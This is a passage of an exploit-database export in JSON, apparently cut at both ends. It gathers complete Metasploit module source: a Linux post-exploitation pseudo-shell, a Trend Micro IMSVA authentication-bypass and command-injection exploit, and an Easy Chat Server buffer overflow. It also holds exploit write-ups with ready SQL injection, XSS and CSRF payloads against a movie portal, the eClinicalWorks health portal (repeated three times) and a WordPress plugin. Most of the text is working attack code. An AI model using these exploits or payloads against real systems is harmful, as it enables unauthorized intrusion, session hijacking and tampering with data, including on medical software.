[\"?\", \"help\", 0, \"Show current help\"],\n [\"ls\", \"dir\", 1, \"List files and folders in a directory\"],\n [\"cat\", \"read_file\", 1, \"Show file contents\"],\n [\"whoami\", \"whoami\", 0, \"Show current user\"],\n [\"cd\", \"cd\", 1, \"Change current directory\"],\n [\"users\", \"get_users\", 0, \"Show list of users\"],\n [\"groups\", \"get_groups\", 0, \"Show list of groups\"],\n [\"pwd\", \"pwd\", 0, \"Show current PATH\"],\n [\"interfaces\", \"interfaces\", 0, \"Show list of network interfaces\"],\n [\"path\", \"get_path\", 0, \"Show current directories included in $PATH enviroment variable\"],\n [\"macs\", \"macs\", 0, \"Show list of MAC addresses\"],\n [\"shell\", \"get_shell_name\", 0, \"Show current SHELL\"],\n [\"hostname\", \"get_hostname\", 0, \"Show current Hostname\"],\n [\"ips\", \"ips\", 0, \"Show list of current IP addresses\"],\n [\"isroot?\", \"is_root?\", 0, \"Show if current user has root permisions\"],\n [\"exit\", \"\", 0, \"Exit the Pseudo-shell\"],\n [\"tcp_ports\", \"listen_tcp_ports\", 0, \"Show list of listen TCP ports\"],\n [\"udp_ports\", \"listen_udp_ports\", 0, \"Show list of listen UDP ports\"],\n [\"clear\", \"clear_screen\", 0, \"Clear screen\"]].sort\n\nLIST = [].sort\nHELP_COMMANDS.each do |linea|\n LIST.insert(-1, linea[0])\nend\n\n def initialize\n super(\n 'Name' => 'Pseudo-Shell Post-Exploitation Module',\n 'Description' => %q{\n This module will run a Pseudo-Shell.\n },\n 'Author' => 'Alberto Rafael Rodriguez Iglesias <albertocysec[at]gmail.com>',\n 'License' => MSF_LICENSE,\n 'Platform' => ['linux'],\n 'SessionTypes' => ['shell', 'meterpreter']\n )\n end\n\n def run\n @vhostname = get_hostname\n @vusername = whoami\n @vpromptchar = is_root? ? '#' : '$'\n prompt()\n end\n\n def parse_cmd(cmd)\n parts = cmd.split(' ')\n return '' unless parts.length >= 1\n cmd = parts[0]\n nargs = parts.length - 1\n HELP_COMMANDS.each do |linea|\n next unless linea[0] == cmd\n\n func = linea[1]\n if nargs >= 1\n if linea[2] == 1\n args = parts[1]\n else\n nargs = 0\n end\n else\n args = ''\n end\n\n return func, cmd, args, nargs\n end\n\n error = get_shell_name\n message = \"#{error}: #{cmd}: Command does not exist\\n\"\n print message\n message\n end\n\n def help()\n print \"\\n\"\n print \"Commands Help\\n\"\n print \"==============\\n\"\n print \"\\n\"\n printf(\"\\t%-20s%-100s\\n\", \"Command\", \"Description\")\n printf(\"\\t%-20s%-100s\\n\", \"-------\", \"-----------\")\n HELP_COMMANDS.each do |linea|\n printf(\"\\t%-20s%-100s\\n\", linea[0], linea[3])\n end\n print \"\\n\"\n end\n\n def prompt_show()\n promptshell = \"#{@vusername}@#{@vhostname}:#{pwd.strip}#{@vpromptchar} \"\n comp = proc { |s| LIST.grep(/^#{Regexp.escape(s)}/) }\n Readline.completion_append_character = \" \"\n Readline.completion_proc = comp\n input = Readline.readline(promptshell , true)\n return nil if input.nil?\n input\n end\n\n def prompt()\n while input = prompt_show\n break if input == \"exit\"\n break if input == \"exit \"\n begin\n func, command, args, nargs = parse_cmd(input)\n nargs = nargs.to_i\n if command == \"ls\"\n if nargs == 0\n nargs = nargs + 1\n ruta = pwd\n args = ruta\n end\n end\n if nargs > 0\n args = args.strip()\n resultado = public_send(\"#{func}\", \"#{args}\")\n else\n if input == \"\"\n resultado = []\n resultado.insert(-1,\"\")\n else\n resultado = public_send(\"#{func}\")\n end\n end\n if !!resultado == resultado\n if command == \"isroot?\"\n print resultado ? \"true\\n\" : \"false\\n\"\n end\n else\n if resultado.class == Array\n print resultado.join(\"\\n\")\n print \"\\n\"\n else\n if resultado.strip() != \"\"\n print resultado.chomp() + \"\\n\"\n end\n end\n end\n rescue # begin\n next\n end # begin\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/linux/manage/pseudo_shell.rb"}, {"lastseen": "2019-11-21T22:51:13", "bulletinFamily": "exploit", "description": "This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a terminal command under the context of the web server user. The specific flaw exists within the management interface, which listens on TCP port 443 by default. Trend Micro IMSVA product have widget feature which is implemented with PHP. Insecurely configured web server exposes diagnostic.log file, which leads to an extraction of JSESSIONID value from administrator session. Proxy.php files under the mod TMCSS folder takes multiple parameter but the process does not properly validate a user-supplied string before using it to execute a system call. Due to combination of these vulnerabilities, unauthenticated users can execute a terminal command under the context of the web server user.\n", "modified": "2019-08-15T23:10:44", "published": "2017-10-08T15:15:32", "id": "MSF:EXPLOIT/LINUX/HTTP/TRENDMICRO_IMSVA_WIDGET_EXEC", "href": "", "type": "metasploit", "title": "Trend Micro InterScan Messaging Security (Virtual Appliance) Remote Code Execution", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Trend Micro InterScan Messaging Security (Virtual Appliance) Remote Code Execution\",\n 'Description' => %q{\n This module exploits the authentication bypass and command injection vulnerability together. Unauthenticated users can execute a\n terminal command under the context of the web server user.\n\n The specific flaw exists within the management interface, which listens on TCP port 443 by default. Trend Micro IMSVA product\n have widget feature which is implemented with PHP. Insecurely configured web server exposes diagnostic.log file, which\n leads to an extraction of JSESSIONID value from administrator session. Proxy.php files under the mod TMCSS folder takes multiple parameter but the process\n does not properly validate a user-supplied string before using it to execute a system call. Due to combination of these vulnerabilities,\n unauthenticated users can execute a terminal command under the context of the web server user.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'mr_me <mr_me@offensive-security.com>', # author of command injection\n 'Mehmet Ince <mehmet@mehmetince.net>' # author of authentication bypass & msf module\n ],\n 'References' =>\n [\n ['URL', 'https://pentest.blog/one-ring-to-rule-them-all-same-rce-on-multiple-trend-micro-products/'],\n ['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-17-521/'],\n ],\n 'DefaultOptions' =>\n {\n 'SSL' => true,\n 'RPORT' => 8445\n },\n 'Payload' =>\n {\n 'Compat' =>\n {\n 'ConnectionType' => '-bind'\n },\n },\n 'Platform' => ['python'],\n 'Arch' => ARCH_PYTHON,\n 'Targets' => [[ 'Automatic', {}]],\n 'Privileged' => false,\n 'DisclosureDate' => \"Oct 7 2017\",\n 'DefaultTarget' => 0\n ))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'The URI of the Trend Micro IMSVA management interface', '/'])\n ]\n )\n end\n\n def extract_jsessionid\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'widget', 'repository', 'log', 'diagnostic.log')\n })\n if res && res.code == 200 && res.body.include?('JSEEEIONID')\n res.body.scan(/JSEEEIONID:([A-F0-9]{32})/).flatten.last\n else\n nil\n end\n end\n\n def widget_auth(jsessionid)\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'widget', 'index.php'),\n 'cookie' => \"CurrentLocale=en-U=en_US; JSESSIONID=#{jsessionid}\"\n })\n if res && res.code == 200 && res.body.include?('USER_GENERATED_WIDGET_DIR')\n res.get_cookies\n else\n nil\n end\n end\n\n def check\n # If we've managed to bypass authentication, that means target is most likely vulnerable.\n jsessionid = extract_jsessionid\n if jsessionid.nil?\n return Exploit::CheckCode::Safe\n end\n auth = widget_auth(jsessionid)\n if auth.nil?\n Exploit::CheckCode::Safe\n else\n Exploit::CheckCode::Appears\n end\n end\n\n def exploit\n print_status('Extracting JSESSIONID from publicly accessible log file')\n jsessionid = extract_jsessionid\n if jsessionid.nil?\n fail_with(Failure::NotVulnerable, \"Target is not vulnerable.\")\n else\n print_good(\"Awesome. JSESSIONID value = #{jsessionid}\")\n end\n\n print_status('Initiating session with widget framework')\n cookies = widget_auth(jsessionid)\n if cookies.nil?\n fail_with(Failure::NoAccess, \"Latest JSESSIONID is expired. Wait for sysadmin to login IMSVA\")\n else\n print_good('Session with widget framework successfully initiated.')\n end\n\n print_status('Trigerring command injection vulnerability')\n send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'widget', 'proxy_controller.php'),\n 'cookie' => \"CurrentLocale=en-US; LogonUser=root; JSESSIONID=#{jsessionid}; #{cookies}\",\n 'vars_post' => {\n 'module' => 'modTMCSS',\n 'serverid' => '1',\n 'TOP' => \"$(python -c \\\"#{payload.encoded}\\\")\"\n }\n })\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/trendmicro_imsva_widget_exec.rb"}, {"lastseen": "2019-12-06T03:17:57", "bulletinFamily": "exploit", "description": "This module exploits a buffer overflow during user registration in Easy Chat Server software.\n", "modified": "2017-07-24T13:26:21", "published": "2017-06-19T22:36:59", "id": "MSF:EXPLOIT/WINDOWS/HTTP/EASYCHATSERVER_SEH", "href": "", "type": "metasploit", "title": "Easy Chat Server User Registeration Buffer Overflow (SEH)", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Easy Chat Server User Registeration Buffer Overflow (SEH)',\n 'Description' => %q{\n This module exploits a buffer overflow during user registration in Easy Chat Server software.\n },\n 'Author' =>\n [\n 'Marco Rivoli', #Metasploit\n 'Aitezaz Mohsin' #POC\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '42155' ],\n ],\n 'Privileged' => true,\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\\x7e\\x2b\\x26\\x3d\\x25\\x3a\\x22\\x0a\\x0d\\x20\\x2f\\x5c\\x2e\",\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Easy Chat Server 2.0 to 3.1', { 'Ret' => 0x100104bc } ],\n ],\n 'DefaultOptions' => {\n 'RPORT' => 80,\n 'EXITFUNC' => 'thread',\n 'ENCODER' => 'x86/alpha_mixed'\n },\n 'DisclosureDate' => 'Oct 09 2017',\n 'DefaultTarget' => 0))\n end\n\n def exploit\n sploit = rand_text_alpha_upper(217)\n sploit << \"\\xeb\\x06\\x90\\x90\"\n sploit << [target.ret].pack('V')\n sploit << payload.encoded\n sploit << rand_text_alpha_upper(200)\n\n res = send_request_cgi({\n 'uri' => normalize_uri(URI,'registresult.htm'),\n 'method' => 'POST',\n 'vars_post' => {\n 'UserName' => sploit,\n 'Password' => 'test',\n 'Password1' => 'test',\n 'Sex' => 1,\n 'Email' => 'x@',\n 'Icon' => 'x.gif',\n 'Resume' => 'xxxx',\n 'cw' => 1,\n 'RoomID' => 4,\n 'RepUserName' => 'admin',\n 'submit1' => 'Register'\n }\n })\n handler\n\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/easychatserver_seh.rb"}], "zdt": [{"lastseen": "2018-01-04T11:06:36", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2017-01-26T00:00:00", "published": "2017-01-26T00:00:00", "href": "https://0day.today/exploit/description/26798", "id": "1337DAY-ID-26798", "title": "Movie Portal Script 7.36 - Multiple Vulnerabilities", "type": "zdt", "sourceData": "Exploit Title : Movie Portal Script v7.36 - Multiple Vulnerability\r\nGoogle Dork : -\r\nDate : 20/01/2017\r\nExploit Author : Marc Castejon <[email\u00a0protected]>\r\nVendor Homepage : http://itechscripts.com/movie-portal-script/\r\nSoftware Link: http://movie-portal.itechscripts.com\r\nType : webapps\r\nPlatform: PHP\r\nSofware Price and Demo : $250\r\n \r\n------------------------------------------------\r\nType: Error Based Sql Injection\r\nVulnerable URL:http://localhost/[PATH]/show_news.php\r\nVulnerable Parameters: id\r\nMethod: GET\r\nPayload: AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(0x71786b7a71,(SELECT\r\n(ELT(1222=1222,1))),0x717a627871,FLOOR(RAND(0)*2))x FROM\r\nINFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)\r\n \r\n-----------------------------------------------\r\nType: Reflected XSS\r\nVulnerable URL: http://localhost/[PATH]/movie.php\r\nVulnerable Parameters : f=\r\nPayload:<img src=i onerror=prompt(1)>\r\n---------------------------------------------\r\nType: Error Based Sql Injection\r\nVulnerable URL:http://localhost/[PATH]/show_misc_video.php\r\nVulnerable Parameters: id\r\nMethod: GET\r\nPayload: AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(0x71786b7a71,(SELECT\r\n(ELT(1222=1222,1))),0x717a627871,FLOOR(RAND(0)*2))x FROM\r\nINFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)\r\n-----------------------------------------------\r\n \r\nType:Union Query Sql Injection\r\nVulnerable URL:http://localhost/[PATH]/movie.php\r\nVulnerable Parameters: f\r\nMethod: GET\r\nPayload: -4594 UNION ALL SELECT\r\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71626a7871,0x6452766b715a73727a634a497a7370474e6744576c737a6a436a6e566e546c68425a4b426a53544d,0x71627a7171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#\r\n-----------------------------------------------\r\nType: Union Query Sql Injection\r\nVulnerable URL:http://localhost/[PATH]/artist-display.php\r\nVulnerable Parameters: act\r\nMethod: GET\r\nPayload: UNION ALL SELECT\r\nNULL,CONCAT(0x71706a7871,0x6b704f42447249656672596d4851736d486b45414a53714158786549644646716377666471545553,0x717a6a7a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#\r\n-----------------------------------------------\r\n \r\nType: Error Based Sql Injection\r\nVulnerable URL:http://localhost/[PATH]/film-rating.php\r\nVulnerable Parameters: v\r\nMethod: GET\r\nPayload: AND (SELECT 1222 FROM(SELECT COUNT(*),CONCAT(0x71786b7a71,(SELECT\r\n(ELT(1222=1222,1))),0x717a627871,FLOOR(RAND(0)*2))x FROM\r\nINFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)\n\n# 0day.today [2018-01-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/26798"}, {"lastseen": "2018-01-05T15:26:49", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2016-02-02T00:00:00", "published": "2016-02-02T00:00:00", "id": "1337DAY-ID-24887", "href": "https://0day.today/exploit/description/24887", "type": "zdt", "title": "eClinicalWorks (CCMR) - Multiple Vulnerabilities", "sourceData": "# Title: eClinicalWorks (CCMR) - Multiple Vulnerabilities\r\n# Vendor: https://www.eclinicalworks.com\r\n# Product: eClinicalWorks Population Health (CCMR) Client Portal Software \r\n# URL: https://www.eclinicalworks.com/products-services/population-health-ccmr/\r\n# Credit: Jerold Hoong\r\n \r\n-------------------------------------\r\n \r\n# CVE-2015-4591 CROSS-SITE SCRIPTING\r\nCross-site scripting (XSS) vulnerability in login.jsp in eClinicalWorks Population\r\nHealth (CCMR) Client Portal Software allows remote authenticated users to inject\r\narbitrary javascript via the strMessage parameter.\r\n \r\nhttps://127.0.0.1/mobiledoc/jsp/ccmr/clientPortal/login.jsp?strMessage=\r\n%3Cimg%20src=/%20onerror=%22alert%28document.cookie%29%22/%3E\r\n \r\n-------------------------------------\r\n \r\n# CVE-2015-4592 SQL INJECTION\r\nSQL injection vulnerability in portalUserService.jsp in eClinicalWorks Population\r\nHealth (CCMR) Client Portal Software allows remote authenticated users to inject\r\narbitrary malicious database commands as part of user input.\r\n \r\nParameter: uemail (POST PARAMETER)\r\nType: stacked queries\r\nTitle: Microsoft SQL Server/Sybase stacked queries (comment)\r\nPayload: action=updatePersonalInfo&ufname=john&ulname=doe&upaddress=&upcity=&upstate=\r\n&zipcode=&[email\u00a0protected]';WAITFOR DELAY '0:0:5'--&upphone=0&umobileno=\r\n \r\nPOST /mobiledoc/jsp/ccmr/clientPortal/admin/service/portalUserService.jsp HTTP/1.1\r\nHost: 127.0.0.1:443\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0\r\nAccept: application/json, text/javascript, */*; q=0.01\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nX-Requested-With: XMLHttpRequest\r\nReferer: https://127.0.0.1/mobiledoc/jsp/ccmr/clientPortal/dashBoard.jsp\r\nContent-Length: 186\r\n[SNIP] ...\r\nConnection: keep-alive\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n[SNIP] ...\r\n \r\naction=updatePersonalInfo&ufname=john&ulname=doe&upaddress=&upcity=&upstate=\r\n&zipcode=&[email\u00a0protected]';WAITFOR DELAY '0:0:5'--&upphone=0&umobileno=\r\n \r\n-------------------------------------\r\n \r\n# CVE-2015-4593 CROSS-SITE REQUEST FORGERY\r\nCross-site request forgery (CSRF) vulnerability in portalUserService.jsp in eClinicalWorks \r\nClient Portal allows remote attackers to hijack the authentication of content administrators\r\nfor requests that could lead to the creation, modification and deletion of users, appointments\r\nand employees.\r\n \r\n# ADDING OF USER\r\n<html>\r\n <body>\r\n <form action=\"https://127.0.0.1/mobiledoc/jsp/ccmr/clientPortal/admin/service/portalUserService.jsp\" method=\"POST\">\r\n <input type=\"hidden\" name=\"action\" value=\"add\" />\r\n <input type=\"hidden\" name=\"uid\" value=\"0\" />\r\n <input type=\"hidden\" name=\"createdOver\" value=\"1\" />\r\n <input type=\"hidden\" name=\"ufname\" value=\"John\" />\r\n <input type=\"hidden\" name=\"ulname\" value=\"Doe\" />\r\n <input type=\"hidden\" name=\"uminitial\" value=\"\" />\r\n <input type=\"hidden\" name=\"selUserType\" value=\"1\" />\r\n <input type=\"hidden\" name=\"status\" value=\"0\" />\r\n <input type=\"hidden\" name=\"upaddress\" value=\"\" />\r\n <input type=\"hidden\" name=\"upcity\" value=\"\" />\r\n <input type=\"hidden\" name=\"upstate\" value=\"\" />\r\n <input type=\"hidden\" name=\"zipcode\" value=\"\" />\r\n <input type=\"hidden\" name=\"uemail\" value=\"[email\u00a0protected]\" />\r\n <input type=\"hidden\" name=\"upphone\" value=\"98999299\" />\r\n <input type=\"hidden\" name=\"umobileno\" value=\"\" />\r\n <input type=\"submit\" value=\"Submit request\" />\r\n </form>\r\n </body>\r\n</html>\r\n \r\n-------------------------------------\r\n \r\n# CVE-2015-4594 SESSION FIXATION\r\nThe web application is vulnerable to session fixation attacks. When authenticating a user\r\nthe application does not assign a new session ID, making it possible to use an existent\r\nsession ID.\r\n \r\n-------------------------------------\r\n \r\n# TIMELINE\r\n\u2013 16/06/2015: Vulnerability found\r\n\u2013 16/06/2015: Vendor informed\r\n\u2013 16/06/2015: Request for CVE IDs\r\n- 16/06/2015: MITRE issued CVE numbers\r\n\u2013 16/06/2015: Vendor responded requesting more information on support contract etc\r\n- 21/06/2015: No support contract, vendor does not open case\r\n- 22/06/2015: Requested update from vendor, no response\r\n- 01/07/2015: Contacted vendor again, vendor requested for support contract again\r\n- 02/07/2015: No support contract, no response from vendor\r\n\u2013 31/01/2016: Public disclosure\n\n# 0day.today [2018-01-05] #", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://0day.today/exploit/24887"}, {"lastseen": "2018-04-13T05:42:53", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2016-01-29T00:00:00", "published": "2016-01-29T00:00:00", "id": "1337DAY-ID-24882", "href": "https://0day.today/exploit/description/24882", "type": "zdt", "title": "WordPress Simple Add Pages or Posts 1.6 Plugin - Cross-Site Request Forgery", "sourceData": "########################################################################\r\n# Exploit Title: Wordpress simple add pages or posts CSRF Vulnerability\r\n# Date: 2016/29/01\r\n# Exploit Author: ALIREZA_PROMIS\r\n# Vendor Homepage: https://wordpress.org/plugins/simple-add-pages-or-posts/\r\n# Software Link: https://downloads.wordpress.org/plugin/simple-add-pages-or-posts.1.6.zip\r\n# Version: 1.6\r\n# Tested on: ubuntu / FireFox\r\n########################################################################\r\n \r\n[Exploitation]\r\nhttps://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29\r\n \r\n[HTML CODE ]\r\n<form id=\"form1\" name=\"form1\" method=\"post\" action=\"http://site.com/wp-admin/plugins.php?page=simple-add-pages-or-posts%2Fsimple_add_pages_or_posts.php\"\r\n<select name=\"postorpage\">\r\n<option value=\"page\">Page</option>\r\n<option value=\"post\">Post</option>\r\n</select>\r\n<td colspan=\"2\"><select name='post_parent' id='post_parent'>\r\n<option value=\"\">No, do not use parent</option>\r\n<option class=\"level-0\" value=\"2\">Sample Page</option>\r\n</select>\r\n<tr class=\"alternate iedit\">\r\n<textarea name=\"titles\" rows=\"1\" cols=\"30\"></textarea>\r\n<tr class=\"iedit\">\r\n<td colspan=\"2\"><select name=\"author_id\">\r\n<option value=\"1\">admin</option></select>\r\n<input type=\"submit\" name=\"submitbutton\" value=\"Add\" class=\"button-primary\"></form>\r\n \r\n \r\n \r\nand live POST request :\r\npostorpage=page&post_parent=2&titles=TEST_CSRF&author_id=1&submitbutton=Add\r\n \r\n \r\n########################################################################\r\n# Friends : ali ahmady , Mr.Moein , sheytan azzam , Mr.PERSIA , H3llBoy.Blackhat , Amir , Jok3r\r\n# Sajjad Sotoudeh , security , Kamran Helish , Dr.RooT , Milad Inj3ctor , Mr.Turk\r\n#\r\n# [+] fb.com/alirezapomis.blackhat\r\n########################################################################\n\n# 0day.today [2018-04-13] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/24882"}], "cve": [{"lastseen": "2019-05-29T18:14:42", "bulletinFamily": "NVD", "description": "eClinicalWorks Population Health (CCMR) suffers from a session fixation vulnerability. When authenticating a user, the application does not assign a new session ID, making it possible to use an existent session ID.", "modified": "2019-03-13T18:59:00", "id": "CVE-2015-4594", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4594", "published": "2017-01-10T15:59:00", "title": "CVE-2015-4594", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-04T10:03:03", "bulletinFamily": "exploit", "description": "eClinicalWorks (CCMR) - Multiple Vulnerabilities. CVE-2015-4591,CVE-2015-4592,CVE-2015-4593,CVE-2015-4594. Webapps exploit for jsp platform", "modified": "2016-02-02T00:00:00", "published": "2016-02-02T00:00:00", "id": "EDB-ID:39402", "href": "https://www.exploit-db.com/exploits/39402/", "type": "exploitdb", "title": "eClinicalWorks CCMR - Multiple Vulnerabilities", "sourceData": "# Title: eClinicalWorks (CCMR) - Multiple Vulnerabilities\r\n# Vendor: https://www.eclinicalworks.com\r\n# Product: eClinicalWorks Population Health (CCMR) Client Portal Software \r\n# URL: https://www.eclinicalworks.com/products-services/population-health-ccmr/\r\n# Credit: Jerold Hoong\r\n\r\n-------------------------------------\r\n\r\n# CVE-2015-4591 CROSS-SITE SCRIPTING\r\nCross-site scripting (XSS) vulnerability in login.jsp in eClinicalWorks Population\r\nHealth (CCMR) Client Portal Software allows remote authenticated users to inject\r\narbitrary javascript via the strMessage parameter.\r\n\r\nhttps://127.0.0.1/mobiledoc/jsp/ccmr/clientPortal/login.jsp?strMessage=\r\n%3Cimg%20src=/%20onerror=%22alert%28document.cookie%29%22/%3E\r\n\r\n-------------------------------------\r\n\r\n# CVE-2015-4592 SQL INJECTION\r\nSQL injection vulnerability in portalUserService.jsp in eClinicalWorks Population\r\nHealth (CCMR) Client Portal Software allows remote authenticated users to inject\r\narbitrary malicious database commands as part of user input.\r\n\r\nParameter: uemail (POST PARAMETER)\r\nType: stacked queries\r\nTitle: Microsoft SQL Server/Sybase stacked queries (comment)\r\nPayload: action=updatePersonalInfo&ufname=john&ulname=doe&upaddress=&upcity=&upstate=\r\n&zipcode=&uemail=john.doe@test.com';WAITFOR DELAY '0:0:5'--&upphone=0&umobileno=\r\n\r\nPOST /mobiledoc/jsp/ccmr/clientPortal/admin/service/portalUserService.jsp HTTP/1.1\r\nHost: 127.0.0.1:443\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko/20100101 Firefox/38.0\r\nAccept: application/json, text/javascript, */*; q=0.01\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nX-Requested-With: XMLHttpRequest\r\nReferer: https://127.0.0.1/mobiledoc/jsp/ccmr/clientPortal/dashBoard.jsp\r\nContent-Length: 186\r\n[SNIP] ...\r\nConnection: keep-alive\r\nPragma: no-cache\r\nCache-Control: no-cache\r\n[SNIP] ...\r\n\r\naction=updatePersonalInfo&ufname=john&ulname=doe&upaddress=&upcity=&upstate=\r\n&zipcode=&uemail=john.doe@test.com';WAITFOR DELAY '0:0:5'--&upphone=0&umobileno=\r\n\r\n-------------------------------------\r\n\r\n# CVE-2015-4593 CROSS-SITE REQUEST FORGERY\r\nCross-site request forgery (CSRF) vulnerability in portalUserService.jsp in eClinicalWorks \r\nClient Portal allows remote attackers to hijack the authentication of content administrators\r\nfor requests that could lead to the creation, modification and deletion of users, appointments\r\nand employees.\r\n\r\n# ADDING OF USER\r\n<html>\r\n <body>\r\n <form action=\"https://127.0.0.1/mobiledoc/jsp/ccmr/clientPortal/admin/service/portalUserService.jsp\" method=\"POST\">\r\n <input type=\"hidden\" name=\"action\" value=\"add\" />\r\n <input type=\"hidden\" name=\"uid\" value=\"0\" />\r\n <input type=\"hidden\" name=\"createdOver\" value=\"1\" />\r\n <input type=\"hidden\" name=\"ufname\" value=\"John\" />\r\n <input type=\"hidden\" name=\"ulname\" value=\"Doe\" />\r\n <input type=\"hidden\" name=\"uminitial\" value=\"\" />\r\n <input type=\"hidden\" name=\"selUserType\" value=\"1\" />\r\n <input type=\"hidden\" name=\"status\" value=\"0\" />\r\n <input type=\"hidden\" name=\"upaddress\" value=\"\" />\r\n <input type=\"hidden\" name=\"upcity\" value=\"\" />\r\n <input type=\"hidden\" name=\"upstate\" value=\"\" />\r\n <input type=\"hidden\" name=\"zipcode\" value=\"\" />\r\n <input type=\"hidden\" name=\"uemail\" value=\"johndoe@test.com.de\" />\r\n <input type=\"hidden\" name=\"upphone\" value=\"98999299\" />\r\n <input type=\"hidden\" name=\"umobileno\" value=\"\" />\r\n <input type=\"submit\" value=\"Submit request\" />\r\n </form>\r\n </body>\r\n</html>\r\n\r\n-------------------------------------\r\n\r\n# CVE-2015-4594 SESSION FIXATION\r\nThe web application is vulnerable to session fixation attacks. When authenticating a user\r\nthe application does not assign a new session ID, making it possible to use an existent\r\nsession ID.\r\n\r\n-------------------------------------\r\n\r\n# TIMELINE\r\n\u2013 16/06/2015: Vulnerability found\r\n\u2013 16/06/2015: Vendor informed\r\n\u2013 16/06/2015: Request for CVE IDs\r\n- 16/06/2015: MITRE issued CVE numbers\r\n\u2013 16/06/2015: Vendor responded requesting more information on support contract etc\r\n- 21/06/2015: No support contract, vendor does not open case\r\n- 22/06/2015: Requested update from vendor, no response\r\n- 01/07/2015: Contacted vendor again, vendor requested for support contract again\r\n- 02/07/2015: No support contract, no response from vendor\r\n\u2013 31/01/2016: Public disclosure", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/39402/"}], "packetstorm": [{"lastseen": "2016-12-05T22:19:58", "bulletinFamily": "exploit", "description": "", "modified": "2016-02-01T00:00:00", "published": "2016-02-01T00:00:00", "href": "https://packetstormsecurity.com/files/135533/eClinicalWorks-Population-Health-CCMR-SQL-Injection-CSRF-XSS.html", "id": "PACKETSTORM:135533", "title": "eClinicalWorks Population Health (CCMR) SQL Injection / CSRF / XSS", "type": "packetstorm", "sourceData": "`# Title: eClinicalWorks (CCMR) - Multiple Vulnerabilities \n# Vendor: https://www.eclinicalworks.com \n# Product: eClinicalWorks Population Health (CCMR) Client Portal Software \n# URL: https://www.eclinicalworks.com/products-services/population-health-ccmr/ \n# Credit: Jerold Hoong \n \n------------------------------------- \n \n# CVE-2015-4591 CROSS-SITE SCRIPTING \nCross-site scripting (XSS) vulnerability in login.jsp in eClinicalWorks Population \nHealth (CCMR) Client Portal Software allows remote authenticated users to inject \narbitrary javascript via the strMessage parameter. \n \nhttps://127.0.0.1/mobiledoc/jsp/ccmr/clientPortal/login.jsp?strMessage= \n%3Cimg%20src=/%20onerror=%22alert%28document.cookie%29%22/%3E \n \n------------------------------------- \n \n# CVE-2015-4592 SQL INJECTION \nSQL injection vulnerability in portalUserService.jsp in eClinicalWorks Population \nHealth (CCMR) Client Portal Software allows remote authenticated users to inject \narbitrary malicious database commands as part of user input. \n \nParameter: uemail (POST PARAMETER) \nType: stacked queries \nTitle: Microsoft SQL Server/Sybase stacked queries (comment) \nPayload: action=updatePersonalInfo&ufname=john&ulname=doe&upaddress=&upcity=&upstate= \n&zipcode=&uemail=john.doe@test.com';WAITFOR DELAY '0:0:5'--&upphone=0&umobileno= \n \nPOST /mobiledoc/jsp/ccmr/clientPortal/admin/service/portalUserService.jsp HTTP/1.1 \nHost: 127.0.0.1:443 \nUser-Agent: Mozilla/5.0 (Windows NT 6.1; 